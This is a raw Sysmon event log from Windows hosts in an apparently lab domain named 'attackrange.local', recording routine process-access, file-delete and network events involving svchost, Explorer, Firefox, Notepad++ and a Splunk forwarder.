07:45:00.605{466BC892-02AF-60E8-0D00-00000000CF01}9001292C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046202Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046201Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046200Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046199Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046198Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046197Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046196Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046195Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046194Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046193Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046192Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046191Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046190Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001046189Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001046188Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f 10341000x80000000000000001046187Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336 23542300x80000000000000001046186Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFf62a863.TMPMD5=FEEDDF0B48ACBAE2DF2C13E094BA61E1,SHA256=564E4AC53FEF38F8EC2ADC3773CA3AE2E546D9CF626CDED40CA8B8DCCA4D789B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046185Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+57ad5|C:\Windows\System32\TwinUI.dll+37578|C:\Windows\System32\TwinUI.dll+37498|C:\Windows\System32\TwinUI.dll+388e3|C:\Windows\System32\TwinUI.dll+36ebd|C:\Windows\System32\TwinUI.dll+36cc1|C:\Windows\System32\TwinUI.dll+10923d|C:\Windows\System32\TwinUI.dll+d20cf|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046184Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.605{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+57ad5|C:\Windows\System32\TwinUI.dll+375e0|C:\Windows\System32\TwinUI.dll+37485|C:\Windows\System32\TwinUI.dll+388e3|C:\Windows\System32\TwinUI.dll+36ebd|C:\Windows\System32\TwinUI.dll+36cc1|C:\Windows\System32\TwinUI.dll+10923d|C:\Windows\System32\TwinUI.dll+d20cf|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001046183Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.121{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CEBFB9074519C33D8F16D48A26366CC2,SHA256=FF5045CF3E69093F9BB10AB81486F627170F99E2D9173A23FF32BFBC97C87D3C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806217Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:01.925{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1584B50C5B7851FA55E94825EBBDC8AE,SHA256=AB5FFA1E87259C6C1546CC7F0EE1755AE0663535C50F60C19ED39015417CBF58,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046261Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:01.136{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CFAAA1CBCADD6211DA9103BF23B82D6,SHA256=61EF907CA0B93B51AED1EFC8ECFFAC954C5D5BE6AD071499773BC919CE35F11D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806218Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:02.941{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC0478E60A576C90A31AD4A0EFA935C4,SHA256=1336F4D19949604C7CF75073774AE596907067CF7A23B847E994E5408F3BCFB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046295Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.689{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\backup\sil.bat@2021-07-12_074455MD5=71FF16ED78441729EC535AC06F91AFCA,SHA256=2F989756F7E17CF8E3D535EDED7B3FB532D41CDA7A547D69E3D2193901BECCAE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046294Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:54.659{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50920-false10.0.1.12-8000- 10341000x80000000000000001046293Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 